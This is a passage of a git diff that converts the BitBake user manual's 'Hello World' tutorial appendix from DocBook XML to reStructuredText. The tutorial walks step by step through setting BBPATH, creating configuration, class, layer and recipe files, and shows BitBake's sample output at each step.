+have to provide in order to achieve that goal. Recall that BitBake
+utilizes three types of metadata files:
+:ref:`bitbake-user-manual/bitbake-user-manual-intro:configuration files`,
+:ref:`bitbake-user-manual/bitbake-user-manual-intro:classes`, and
+:ref:`bitbake-user-manual/bitbake-user-manual-intro:recipes`.
+But where do they go? How does BitBake find
+them? BitBake's error messaging helps you answer these types of
+questions and helps you better understand exactly what is going on.
+
+Following is the complete "Hello World" example.
+
+#. **Create a Project Directory:** First, set up a directory for the
+ "Hello World" project. Here is how you can do so in your home
+ directory: ::
+
+ $ mkdir ~/hello
+ $ cd ~/hello
+
+ This is the directory that
+ BitBake will use to do all of its work. You can use this directory
+ to keep all the metafiles needed by BitBake. Having a project
+ directory is a good way to isolate your project.
+
+#. **Run BitBake:** At this point, you have nothing but a project
+ directory. Run the ``bitbake`` command and see what it does: ::
+
+ $ bitbake
+ The BBPATH variable is not set and bitbake did not
+ find a conf/bblayers.conf file in the expected location.
+ Maybe you accidentally invoked bitbake from the wrong directory?
+ DEBUG: Removed the following variables from the environment:
+ GNOME_DESKTOP_SESSION_ID, XDG_CURRENT_DESKTOP,
+ GNOME_KEYRING_CONTROL, DISPLAY, SSH_AGENT_PID, LANG, no_proxy,
+ XDG_SESSION_PATH, XAUTHORITY, SESSION_MANAGER, SHLVL,
+ MANDATORY_PATH, COMPIZ_CONFIG_PROFILE, WINDOWID, EDITOR,
+ GPG_AGENT_INFO, SSH_AUTH_SOCK, GDMSESSION, GNOME_KEYRING_PID,
+ XDG_SEAT_PATH, XDG_CONFIG_DIRS, LESSOPEN, DBUS_SESSION_BUS_ADDRESS,
+ _, XDG_SESSION_COOKIE, DESKTOP_SESSION, LESSCLOSE, DEFAULTS_PATH,
+ UBUNTU_MENUPROXY, OLDPWD, XDG_DATA_DIRS, COLORTERM, LS_COLORS
+
+ The majority of this output is specific to environment variables that
+ are not directly relevant to BitBake. However, the very first
+ message regarding the ``BBPATH`` variable and the
+ ``conf/bblayers.conf`` file is relevant.
+
+ When you run BitBake, it begins looking for metadata files. The
+ :term:`BBPATH` variable is what tells BitBake where
+ to look for those files. ``BBPATH`` is not set and you need to set
+ it. Without ``BBPATH``, BitBake cannot find any configuration files
+ (``.conf``) or recipe files (``.bb``) at all. BitBake also cannot
+ find the ``bitbake.conf`` file.
+
+#. **Setting BBPATH:** For this example, you can set ``BBPATH`` in
+ the same manner that you set ``PATH`` earlier in the appendix. You
+ should realize, though, that it is much more flexible to set the
+ ``BBPATH`` variable up in a configuration file for each project.
+
+ From your shell, enter the following commands to set and export the
+ ``BBPATH`` variable: ::
+
+ $ BBPATH="projectdirectory"
+ $ export BBPATH
+
+ Use your actual project directory in the command. BitBake uses that
+ directory to find the metadata it needs for your project.
+
+ .. note::
+
+ When specifying your project directory, do not use the tilde
+ ("~") character as BitBake does not expand that character as the
+ shell would.
+
+#. **Run BitBake:** Now that you have ``BBPATH`` defined, run the
+ ``bitbake`` command again: ::
+
+ $ bitbake
+ ERROR: Traceback (most recent call last):
+ File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
+ return func(fn, *args)
+ File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 173, in parse_config_file
+ return bb.parse.handle(fn, data, include)
+ File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 99, in handle
+ return h['handle'](fn, data, include)
+ File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 120, in handle
+ abs_fn = resolve_file(fn, data)
+ File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 117, in resolve_file
+ raise IOError("file %s not found in %s" % (fn, bbpath))
+ IOError: file conf/bitbake.conf not found in /home/scott-lenovo/hello
+
+ ERROR: Unable to parse conf/bitbake.conf: file conf/bitbake.conf not found in /home/scott-lenovo/hello
+
+ This sample output shows that BitBake could not find the
+ ``conf/bitbake.conf`` file in the project directory. This file is
+ the first thing BitBake must find in order to build a target. And,
+ since the project directory for this example is empty, you need to
+ provide a ``conf/bitbake.conf`` file.
+
+#. **Creating conf/bitbake.conf:** The ``conf/bitbake.conf`` includes
+ a number of configuration variables BitBake uses for metadata and
+ recipe files. For this example, you need to create the file in your
+ project directory and define some key BitBake variables. For more
+ information on the ``bitbake.conf`` file, see
+ http://git.openembedded.org/bitbake/tree/conf/bitbake.conf.
+
+ Use the following commands to create the ``conf`` directory in the
+ project directory: ::
+
+ $ mkdir conf
+
+ From within the ``conf`` directory,
+ use some editor to create the ``bitbake.conf`` so that it contains
+ the following: ::
+
+ PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
+
+ TMPDIR = "${TOPDIR}/tmp"
+ CACHE = "${TMPDIR}/cache"
+ STAMP = "${TMPDIR}/${PN}/stamps"
+ T = "${TMPDIR}/${PN}/work"
+ B = "${TMPDIR}/${PN}"
+
+ .. note::
+
+ Without a value for PN , the variables STAMP , T , and B , prevent more
+ than one recipe from working. You can fix this by either setting PN to
+ have a value similar to what OpenEmbedded and BitBake use in the default
+ bitbake.conf file (see previous example). Or, by manually updating each
+ recipe to set PN . You will also need to include PN as part of the STAMP
+ , T , and B variable definitions in the local.conf file.
+
+ The ``TMPDIR`` variable establishes a directory that BitBake uses
+ for build output and intermediate files other than the cached
+ information used by the
+ :ref:`bitbake-user-manual/bitbake-user-manual-execution:setscene`
+ process. Here, the ``TMPDIR`` directory is set to ``hello/tmp``.
+
+ .. tip::
+
+ You can always safely delete the tmp directory in order to rebuild a
+ BitBake target. The build process creates the directory for you when you
+ run BitBake.
+
+ For information about each of the other variables defined in this
+ example, check :term:`PN`, :term:`TOPDIR`, :term:`CACHE`, :term:`STAMP`,
+ :term:`T` or :term:`B` to take you to the definitions in the
+ glossary.
+
+#. **Run BitBake:** After making sure that the ``conf/bitbake.conf`` file
+ exists, you can run the ``bitbake`` command again: ::
+
+ $ bitbake
+ ERROR: Traceback (most recent call last):
+ File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
+ return func(fn, *args)
+ File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 177, in _inherit
+ bb.parse.BBHandler.inherit(bbclass, "configuration INHERITs", 0, data)
+ File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/BBHandler.py", line 92, in inherit
+ include(fn, file, lineno, d, "inherit")
+ File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 100, in include
+ raise ParseError("Could not %(error_out)s file %(fn)s" % vars(), oldfn, lineno)
+ ParseError: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
+
+ ERROR: Unable to parse base: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
+
+ In the sample output,
+ BitBake could not find the ``classes/base.bbclass`` file. You need
+ to create that file next.
+
+#. **Creating classes/base.bbclass:** BitBake uses class files to
+ provide common code and functionality. The minimally required class
+ for BitBake is the ``classes/base.bbclass`` file. The ``base`` class
+ is implicitly inherited by every recipe. BitBake looks for the class
+ in the ``classes`` directory of the project (i.e ``hello/classes``
+ in this example).
+
+ Create the ``classes`` directory as follows: ::
+
+ $ cd $HOME/hello
+ $ mkdir classes
+
+ Move to the ``classes`` directory and then create the
+ ``base.bbclass`` file by inserting this single line: addtask build
+ The minimal task that BitBake runs is the ``do_build`` task. This is
+ all the example needs in order to build the project. Of course, the
+ ``base.bbclass`` can have much more depending on which build
+ environments BitBake is supporting.
+
+#. **Run BitBake:** After making sure that the ``classes/base.bbclass``
+ file exists, you can run the ``bitbake`` command again: ::
+
+ $ bitbake
+ Nothing to do. Use 'bitbake world' to build everything, or run 'bitbake --help' for usage information.
+
+ BitBake is finally reporting
+ no errors. However, you can see that it really does not have
+ anything to do. You need to create a recipe that gives BitBake
+ something to do.
+
+#. **Creating a Layer:** While it is not really necessary for such a
+ small example, it is good practice to create a layer in which to
+ keep your code separate from the general metadata used by BitBake.
+ Thus, this example creates and uses a layer called "mylayer".
+
+ .. note::
+
+ You can find additional information on layers in the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-intro:Layers`" section.
+
+ Minimally, you need a recipe file and a layer configuration file in
+ your layer. The configuration file needs to be in the ``conf``
+ directory inside the layer. Use these commands to set up the layer
+ and the ``conf`` directory: ::
+
+ $ cd $HOME
+ $ mkdir mylayer
+ $ cd mylayer
+ $ mkdir conf
+
+ Move to the ``conf`` directory and create a ``layer.conf`` file that has the
+ following: ::
+
+ BBPATH .= ":${LAYERDIR}"
+ BBFILES += "${LAYERDIR}/\*.bb"
+ BBFILE_COLLECTIONS += "mylayer"
+ `BBFILE_PATTERN_mylayer := "^${LAYERDIR_RE}/"
+
+ For information on these variables, click on :term:`BBFILES`,
+ :term:`LAYERDIR`, :term:`BBFILE_COLLECTIONS` or :term:`BBFILE_PATTERN_mylayer <BBFILE_PATTERN>`
+ to go to the definitions in the glossary.
+
+ You need to create the recipe file next. Inside your layer at the
+ top-level, use an editor and create a recipe file named
+ ``printhello.bb`` that has the following: ::
+
+ DESCRIPTION = "Prints Hello World"
+ PN = 'printhello'
+ PV = '1'
+
+ python do_build() {
+ bb.plain("********************");
+ bb.plain("* *");
+ bb.plain("* Hello, World! *");
+ bb.plain("* *");
+ bb.plain("********************");
+ }
+
+ The recipe file simply provides
+ a description of the recipe, the name, version, and the ``do_build``
+ task, which prints out "Hello World" to the console. For more
+ information on :term:`DESCRIPTION`, :term:`PN` or :term:`PV`
+ follow the links to the glossary.
+
+#. **Run BitBake With a Target:** Now that a BitBake target exists, run
+ the command and provide that target: ::
+
+ $ cd $HOME/hello
+ $ bitbake printhello
+ ERROR: no recipe files to build, check your BBPATH and BBFILES?
+
+ Summary: There was 1 ERROR message shown, returning a non-zero exit code.
+
+ We have created the layer with the recipe and
+ the layer configuration file but it still seems that BitBake cannot
+ find the recipe. BitBake needs a ``conf/bblayers.conf`` that lists
+ the layers for the project. Without this file, BitBake cannot find
+ the recipe.
+
+#. **Creating conf/bblayers.conf:** BitBake uses the
+ ``conf/bblayers.conf`` file to locate layers needed for the project.
+ This file must reside in the ``conf`` directory of the project (i.e.
+ ``hello/conf`` for this example).
+
+ Set your working directory to the ``hello/conf`` directory and then
+ create the ``bblayers.conf`` file so that it contains the following: ::
+
+ BBLAYERS ?= " \
+ /home/<you>/mylayer \
+ "
+
+ You need to provide your own information for ``you`` in the file.
+
+#. **Run BitBake With a Target:** Now that you have supplied the
+ ``bblayers.conf`` file, run the ``bitbake`` command and provide the
+ target: ::
+
+ $ bitbake printhello
+ Parsing recipes: 100% |##################################################################################|
+ Time: 00:00:00
+ Parsing of 1 .bb files complete (0 cached, 1 parsed). 1 targets, 0 skipped, 0 masked, 0 errors.
+ NOTE: Resolving any missing task queue dependencies
+ NOTE: Preparing RunQueue
+ NOTE: Executing RunQueue Tasks
+ ********************
+ * *
+ * Hello, World! *
+ * *
+ ********************
+ NOTE: Tasks Summary: Attempted 1 tasks of which 0 didn't need to be rerun and all succeeded.
+
+ .. note::
+
+ After the first execution, re-running bitbake printhello again will not
+ result in a BitBake run that prints the same console output. The reason
+ for this is that the first time the printhello.bb recipe's do_build task
+ executes successfully, BitBake writes a stamp file for the task. Thus,
+ the next time you attempt to run the task using that same bitbake
+ command, BitBake notices the stamp and therefore determines that the task
+ does not need to be re-run. If you delete the tmp directory or run
+ bitbake -c clean printhello and then re-run the build, the "Hello,
+ World!" message will be printed again.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml
deleted file mode 100644
index 11eb36aaf8..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-hello.xml
+++ /dev/null
@@ -1,513 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<appendix id='hello-world-example'>
- <title>Hello World Example</title>
-
- <section id='bitbake-hello-world'>
- <title>BitBake Hello World</title>
-
- <para>
- The simplest example commonly used to demonstrate any new
- programming language or tool is the
- "<ulink url="http://en.wikipedia.org/wiki/Hello_world_program">Hello World</ulink>"
- example.
- This appendix demonstrates, in tutorial form, Hello
- World within the context of BitBake.
- The tutorial describes how to create a new project
- and the applicable metadata files necessary to allow
- BitBake to build it.
- </para>
- </section>
-
- <section id='example-obtaining-bitbake'>
- <title>Obtaining BitBake</title>
-
- <para>
- See the
- "<link linkend='obtaining-bitbake'>Obtaining BitBake</link>"
- section for information on how to obtain BitBake.
- Once you have the source code on your machine, the BitBake directory
- appears as follows:
- <literallayout class='monospaced'>
- $ ls -al
- total 100
- drwxrwxr-x. 9 wmat wmat 4096 Jan 31 13:44 .
- drwxrwxr-x. 3 wmat wmat 4096 Feb 4 10:45 ..
- -rw-rw-r--. 1 wmat wmat 365 Nov 26 04:55 AUTHORS
- drwxrwxr-x. 2 wmat wmat 4096 Nov 26 04:55 bin
- drwxrwxr-x. 4 wmat wmat 4096 Jan 31 13:44 build
- -rw-rw-r--. 1 wmat wmat 16501 Nov 26 04:55 ChangeLog
- drwxrwxr-x. 2 wmat wmat 4096 Nov 26 04:55 classes
- drwxrwxr-x. 2 wmat wmat 4096 Nov 26 04:55 conf
- drwxrwxr-x. 3 wmat wmat 4096 Nov 26 04:55 contrib
- -rw-rw-r--. 1 wmat wmat 17987 Nov 26 04:55 COPYING
- drwxrwxr-x. 3 wmat wmat 4096 Nov 26 04:55 doc
- -rw-rw-r--. 1 wmat wmat 69 Nov 26 04:55 .gitignore
- -rw-rw-r--. 1 wmat wmat 849 Nov 26 04:55 HEADER
- drwxrwxr-x. 5 wmat wmat 4096 Jan 31 13:44 lib
- -rw-rw-r--. 1 wmat wmat 195 Nov 26 04:55 MANIFEST.in
- -rw-rw-r--. 1 wmat wmat 2887 Nov 26 04:55 TODO
- </literallayout>
- </para>
-
- <para>
- At this point, you should have BitBake cloned to
- a directory that matches the previous listing except for
- dates and user names.
- </para>
- </section>
-
- <section id='setting-up-the-bitbake-environment'>
- <title>Setting Up the BitBake Environment</title>
-
- <para>
- First, you need to be sure that you can run BitBake.
- Set your working directory to where your local BitBake
- files are and run the following command:
- <literallayout class='monospaced'>
- $ ./bin/bitbake --version
- BitBake Build Tool Core version 1.23.0, bitbake version 1.23.0
- </literallayout>
- The console output tells you what version you are running.
- </para>
-
- <para>
- The recommended method to run BitBake is from a directory of your
- choice.
- To be able to run BitBake from any directory, you need to add the
- executable binary to your binary to your shell's environment
- <filename>PATH</filename> variable.
- First, look at your current <filename>PATH</filename> variable
- by entering the following:
- <literallayout class='monospaced'>
- $ echo $PATH
- </literallayout>
- Next, add the directory location for the BitBake binary to the
- <filename>PATH</filename>.
- Here is an example that adds the
- <filename>/home/scott-lenovo/bitbake/bin</filename> directory
- to the front of the <filename>PATH</filename> variable:
- <literallayout class='monospaced'>
- $ export PATH=/home/scott-lenovo/bitbake/bin:$PATH
- </literallayout>
- You should now be able to enter the <filename>bitbake</filename>
- command from the command line while working from any directory.
- </para>
- </section>
-
- <section id='the-hello-world-example'>
- <title>The Hello World Example</title>
-
- <para>
- The overall goal of this exercise is to build a
- complete "Hello World" example utilizing task and layer
- concepts.
- Because this is how modern projects such as OpenEmbedded and
- the Yocto Project utilize BitBake, the example
- provides an excellent starting point for understanding
- BitBake.
- </para>
-
- <para>
- To help you understand how to use BitBake to build targets,
- the example starts with nothing but the <filename>bitbake</filename>
- command, which causes BitBake to fail and report problems.
- The example progresses by adding pieces to the build to
- eventually conclude with a working, minimal "Hello World"
- example.
- </para>
-
- <para>
- While every attempt is made to explain what is happening during
- the example, the descriptions cannot cover everything.
- You can find further information throughout this manual.
- Also, you can actively participate in the
- <ulink url='http://lists.openembedded.org/mailman/listinfo/bitbake-devel'></ulink>
- discussion mailing list about the BitBake build tool.
- </para>
-
- <note>
- This example was inspired by and drew heavily from
- <ulink url="http://www.mail-archive.com/yocto@yoctoproject.org/msg09379.html">Mailing List post - The BitBake equivalent of "Hello, World!"</ulink>.
- </note>
-
- <para>
- As stated earlier, the goal of this example
- is to eventually compile "Hello World".
- However, it is unknown what BitBake needs and what you have
- to provide in order to achieve that goal.
- Recall that BitBake utilizes three types of metadata files:
- <link linkend='configuration-files'>Configuration Files</link>,
- <link linkend='classes'>Classes</link>, and
- <link linkend='recipes'>Recipes</link>.
- But where do they go?
- How does BitBake find them?
- BitBake's error messaging helps you answer these types of questions
- and helps you better understand exactly what is going on.
- </para>
-
- <para>
- Following is the complete "Hello World" example.
- </para>
-
- <orderedlist>
- <listitem><para><emphasis>Create a Project Directory:</emphasis>
- First, set up a directory for the "Hello World" project.
- Here is how you can do so in your home directory:
- <literallayout class='monospaced'>
- $ mkdir ~/hello
- $ cd ~/hello
- </literallayout>
- This is the directory that BitBake will use to do all of
- its work.
- You can use this directory to keep all the metafiles needed
- by BitBake.
- Having a project directory is a good way to isolate your
- project.
- </para></listitem>
- <listitem><para><emphasis>Run BitBake:</emphasis>
- At this point, you have nothing but a project directory.
- Run the <filename>bitbake</filename> command and see what
- it does:
- <literallayout class='monospaced'>
- $ bitbake
- The BBPATH variable is not set and bitbake did not
- find a conf/bblayers.conf file in the expected location.
- Maybe you accidentally invoked bitbake from the wrong directory?
- DEBUG: Removed the following variables from the environment:
- GNOME_DESKTOP_SESSION_ID, XDG_CURRENT_DESKTOP,
- GNOME_KEYRING_CONTROL, DISPLAY, SSH_AGENT_PID, LANG, no_proxy,
- XDG_SESSION_PATH, XAUTHORITY, SESSION_MANAGER, SHLVL,
- MANDATORY_PATH, COMPIZ_CONFIG_PROFILE, WINDOWID, EDITOR,
- GPG_AGENT_INFO, SSH_AUTH_SOCK, GDMSESSION, GNOME_KEYRING_PID,
- XDG_SEAT_PATH, XDG_CONFIG_DIRS, LESSOPEN, DBUS_SESSION_BUS_ADDRESS,
- _, XDG_SESSION_COOKIE, DESKTOP_SESSION, LESSCLOSE, DEFAULTS_PATH,
- UBUNTU_MENUPROXY, OLDPWD, XDG_DATA_DIRS, COLORTERM, LS_COLORS
- </literallayout>
- The majority of this output is specific to environment variables
- that are not directly relevant to BitBake.
- However, the very first message regarding the
- <filename>BBPATH</filename> variable and the
- <filename>conf/bblayers.conf</filename> file
- is relevant.</para>
- <para>
- When you run BitBake, it begins looking for metadata files.
- The
- <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
- variable is what tells BitBake where to look for those files.
- <filename>BBPATH</filename> is not set and you need to set it.
- Without <filename>BBPATH</filename>, BitBake cannot
- find any configuration files (<filename>.conf</filename>)
- or recipe files (<filename>.bb</filename>) at all.
- BitBake also cannot find the <filename>bitbake.conf</filename>
- file.
- </para></listitem>
- <listitem><para><emphasis>Setting <filename>BBPATH</filename>:</emphasis>
- For this example, you can set <filename>BBPATH</filename>
- in the same manner that you set <filename>PATH</filename>
- earlier in the appendix.
- You should realize, though, that it is much more flexible to set the
- <filename>BBPATH</filename> variable up in a configuration
- file for each project.</para>
- <para>From your shell, enter the following commands to set and
- export the <filename>BBPATH</filename> variable:
- <literallayout class='monospaced'>
- $ BBPATH="<replaceable>projectdirectory</replaceable>"
- $ export BBPATH
- </literallayout>
- Use your actual project directory in the command.
- BitBake uses that directory to find the metadata it needs for
- your project.
- <note>
- When specifying your project directory, do not use the
- tilde ("~") character as BitBake does not expand that character
- as the shell would.
- </note>
- </para></listitem>
- <listitem><para><emphasis>Run BitBake:</emphasis>
- Now that you have <filename>BBPATH</filename> defined, run
- the <filename>bitbake</filename> command again:
- <literallayout class='monospaced'>
- $ bitbake
- ERROR: Traceback (most recent call last):
- File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
- return func(fn, *args)
- File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 173, in parse_config_file
- return bb.parse.handle(fn, data, include)
- File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 99, in handle
- return h['handle'](fn, data, include)
- File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 120, in handle
- abs_fn = resolve_file(fn, data)
- File "/home/scott-lenovo/bitbake/lib/bb/parse/__init__.py", line 117, in resolve_file
- raise IOError("file %s not found in %s" % (fn, bbpath))
- IOError: file conf/bitbake.conf not found in /home/scott-lenovo/hello
-
- ERROR: Unable to parse conf/bitbake.conf: file conf/bitbake.conf not found in /home/scott-lenovo/hello
- </literallayout>
- This sample output shows that BitBake could not find the
- <filename>conf/bitbake.conf</filename> file in the project
- directory.
- This file is the first thing BitBake must find in order
- to build a target.
- And, since the project directory for this example is
- empty, you need to provide a <filename>conf/bitbake.conf</filename>
- file.
- </para></listitem>
- <listitem><para><emphasis>Creating <filename>conf/bitbake.conf</filename>:</emphasis>
- The <filename>conf/bitbake.conf</filename> includes a number of
- configuration variables BitBake uses for metadata and recipe
- files.
- For this example, you need to create the file in your project directory
- and define some key BitBake variables.
- For more information on the <filename>bitbake.conf</filename> file,
- see
- <ulink url='http://git.openembedded.org/bitbake/tree/conf/bitbake.conf'></ulink>.
- </para>
- <para>Use the following commands to create the <filename>conf</filename>
- directory in the project directory:
- <literallayout class='monospaced'>
- $ mkdir conf
- </literallayout>
- From within the <filename>conf</filename> directory, use
- some editor to create the <filename>bitbake.conf</filename>
- so that it contains the following:
- <literallayout class='monospaced'>
- <link linkend='var-bb-PN'>PN</link> = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
- </literallayout>
- <literallayout class='monospaced'>
- TMPDIR = "${<link linkend='var-bb-TOPDIR'>TOPDIR</link>}/tmp"
- <link linkend='var-bb-CACHE'>CACHE</link> = "${TMPDIR}/cache"
- <link linkend='var-bb-STAMP'>STAMP</link> = "${TMPDIR}/${PN}/stamps"
- <link linkend='var-bb-T'>T</link> = "${TMPDIR}/${PN}/work"
- <link linkend='var-bb-B'>B</link> = "${TMPDIR}/${PN}"
- </literallayout>
- <note>
- Without a value for <filename>PN</filename>, the
- variables <filename>STAMP</filename>,
- <filename>T</filename>, and <filename>B</filename>,
- prevent more than one recipe from working. You can fix
- this by either setting <filename>PN</filename> to have
- a value similar to what OpenEmbedded and BitBake use
- in the default <filename>bitbake.conf</filename> file
- (see previous example). Or, by manually updating each
- recipe to set <filename>PN</filename>. You will also
- need to include <filename>PN</filename> as part of the
- <filename>STAMP</filename>, <filename>T</filename>, and
- <filename>B</filename> variable definitions in the
- <filename>local.conf</filename> file.
- </note>
- The <filename>TMPDIR</filename> variable establishes a directory
- that BitBake uses for build output and intermediate files other
- than the cached information used by the
- <link linkend='setscene'>Setscene</link> process.
- Here, the <filename>TMPDIR</filename> directory is set to
- <filename>hello/tmp</filename>.
- <note><title>Tip</title>
- You can always safely delete the <filename>tmp</filename>
- directory in order to rebuild a BitBake target.
- The build process creates the directory for you
- when you run BitBake.
- </note></para>
- <para>For information about each of the other variables defined in this
- example, click on the links to take you to the definitions in
- the glossary.
- </para></listitem>
- <listitem><para><emphasis>Run BitBake:</emphasis>
- After making sure that the <filename>conf/bitbake.conf</filename>
- file exists, you can run the <filename>bitbake</filename>
- command again:
- <literallayout class='monospaced'>
- $ bitbake
- ERROR: Traceback (most recent call last):
- File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 163, in wrapped
- return func(fn, *args)
- File "/home/scott-lenovo/bitbake/lib/bb/cookerdata.py", line 177, in _inherit
- bb.parse.BBHandler.inherit(bbclass, "configuration INHERITs", 0, data)
- File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/BBHandler.py", line 92, in inherit
- include(fn, file, lineno, d, "inherit")
- File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 100, in include
- raise ParseError("Could not %(error_out)s file %(fn)s" % vars(), oldfn, lineno)
- ParseError: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
-
- ERROR: Unable to parse base: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
- </literallayout>
- In the sample output, BitBake could not find the
- <filename>classes/base.bbclass</filename> file.
- You need to create that file next.
- </para></listitem>
- <listitem><para><emphasis>Creating <filename>classes/base.bbclass</filename>:</emphasis>
- BitBake uses class files to provide common code and functionality.
- The minimally required class for BitBake is the
- <filename>classes/base.bbclass</filename> file.
- The <filename>base</filename> class is implicitly inherited by
- every recipe.
- BitBake looks for the class in the <filename>classes</filename>
- directory of the project (i.e <filename>hello/classes</filename>
- in this example).
- </para>
- <para>Create the <filename>classes</filename> directory as follows:
- <literallayout class='monospaced'>
- $ cd $HOME/hello
- $ mkdir classes
- </literallayout>
- Move to the <filename>classes</filename> directory and then
- create the <filename>base.bbclass</filename> file by inserting
- this single line:
- <literallayout class='monospaced'>
- addtask build
- </literallayout>
- The minimal task that BitBake runs is the
- <filename>do_build</filename> task.
- This is all the example needs in order to build the project.
- Of course, the <filename>base.bbclass</filename> can have much
- more depending on which build environments BitBake is
- supporting.
- </para></listitem>
- <listitem><para><emphasis>Run BitBake:</emphasis>
- After making sure that the <filename>classes/base.bbclass</filename>
- file exists, you can run the <filename>bitbake</filename>
- command again:
- <literallayout class='monospaced'>
- $ bitbake
- Nothing to do. Use 'bitbake world' to build everything, or run 'bitbake --help' for usage information.
- </literallayout>
- BitBake is finally reporting no errors.
- However, you can see that it really does not have anything
- to do.
- You need to create a recipe that gives BitBake something to do.
- </para></listitem>
- <listitem><para><emphasis>Creating a Layer:</emphasis>
- While it is not really necessary for such a small example,
- it is good practice to create a layer in which to keep your
- code separate from the general metadata used by BitBake.
- Thus, this example creates and uses a layer called "mylayer".
- <note>
- You can find additional information on layers in the
- "<link linkend='layers'>Layers</link>" section.
- </note></para>
-
- <para>Minimally, you need a recipe file and a layer configuration
- file in your layer.
- The configuration file needs to be in the <filename>conf</filename>
- directory inside the layer.
- Use these commands to set up the layer and the <filename>conf</filename>
- directory:
- <literallayout class='monospaced'>
- $ cd $HOME
- $ mkdir mylayer
- $ cd mylayer
- $ mkdir conf
- </literallayout>
- Move to the <filename>conf</filename> directory and create a
- <filename>layer.conf</filename> file that has the following:
- <literallayout class='monospaced'>
- BBPATH .= ":${<link linkend='var-bb-LAYERDIR'>LAYERDIR</link>}"
-
- <link linkend='var-bb-BBFILES'>BBFILES</link> += "${LAYERDIR}/*.bb"
-
- <link linkend='var-bb-BBFILE_COLLECTIONS'>BBFILE_COLLECTIONS</link> += "mylayer"
- <link linkend='var-bb-BBFILE_PATTERN'>BBFILE_PATTERN_mylayer</link> := "^${LAYERDIR_RE}/"
- </literallayout>
- For information on these variables, click the links
- to go to the definitions in the glossary.</para>
- <para>You need to create the recipe file next.
- Inside your layer at the top-level, use an editor and create
- a recipe file named <filename>printhello.bb</filename> that
- has the following:
- <literallayout class='monospaced'>
- <link linkend='var-bb-DESCRIPTION'>DESCRIPTION</link> = "Prints Hello World"
- <link linkend='var-bb-PN'>PN</link> = 'printhello'
- <link linkend='var-bb-PV'>PV</link> = '1'
-
- python do_build() {
- bb.plain("********************");
- bb.plain("* *");
- bb.plain("* Hello, World! *");
- bb.plain("* *");
- bb.plain("********************");
- }
- </literallayout>
- The recipe file simply provides a description of the
- recipe, the name, version, and the <filename>do_build</filename>
- task, which prints out "Hello World" to the console.
- For more information on these variables, follow the links
- to the glossary.
- </para></listitem>
- <listitem><para><emphasis>Run BitBake With a Target:</emphasis>
- Now that a BitBake target exists, run the command and provide
- that target:
- <literallayout class='monospaced'>
- $ cd $HOME/hello
- $ bitbake printhello
- ERROR: no recipe files to build, check your BBPATH and BBFILES?
-
- Summary: There was 1 ERROR message shown, returning a non-zero exit code.
- </literallayout>
- We have created the layer with the recipe and the layer
- configuration file but it still seems that BitBake cannot
- find the recipe.
- BitBake needs a <filename>conf/bblayers.conf</filename> that
- lists the layers for the project.
- Without this file, BitBake cannot find the recipe.
- </para></listitem>
- <listitem><para><emphasis>Creating <filename>conf/bblayers.conf</filename>:</emphasis>
- BitBake uses the <filename>conf/bblayers.conf</filename> file
- to locate layers needed for the project.
- This file must reside in the <filename>conf</filename> directory
- of the project (i.e. <filename>hello/conf</filename> for this
- example).</para>
- <para>Set your working directory to the <filename>hello/conf</filename>
- directory and then create the <filename>bblayers.conf</filename>
- file so that it contains the following:
- <literallayout class='monospaced'>
- BBLAYERS ?= " \
- /home/&lt;you&gt;/mylayer \
- "
- </literallayout>
- You need to provide your own information for
- <filename>you</filename> in the file.
- </para></listitem>
- <listitem><para><emphasis>Run BitBake With a Target:</emphasis>
- Now that you have supplied the <filename>bblayers.conf</filename>
- file, run the <filename>bitbake</filename> command and provide
- the target:
- <literallayout class='monospaced'>
- $ bitbake printhello
- Parsing recipes: 100% |##################################################################################|
- Time: 00:00:00
- Parsing of 1 .bb files complete (0 cached, 1 parsed). 1 targets, 0 skipped, 0 masked, 0 errors.
- NOTE: Resolving any missing task queue dependencies
- NOTE: Preparing RunQueue
- NOTE: Executing RunQueue Tasks
- ********************
- * *
- * Hello, World! *
- * *
- ********************
- NOTE: Tasks Summary: Attempted 1 tasks of which 0 didn't need to be rerun and all succeeded.
- </literallayout>
- BitBake finds the <filename>printhello</filename> recipe and
- successfully runs the task.
- <note>
- After the first execution, re-running
- <filename>bitbake printhello</filename> again will not
- result in a BitBake run that prints the same console
- output.
- The reason for this is that the first time the
- <filename>printhello.bb</filename> recipe's
- <filename>do_build</filename> task executes
- successfully, BitBake writes a stamp file for the task.
- Thus, the next time you attempt to run the task
- using that same <filename>bitbake</filename> command,
- BitBake notices the stamp and therefore determines
- that the task does not need to be re-run.
- If you delete the <filename>tmp</filename> directory
- or run <filename>bitbake -c clean printhello</filename>
- and then re-run the build, the "Hello, World!" message will
- be printed again.
- </note>
- </para></listitem>
- </orderedlist>
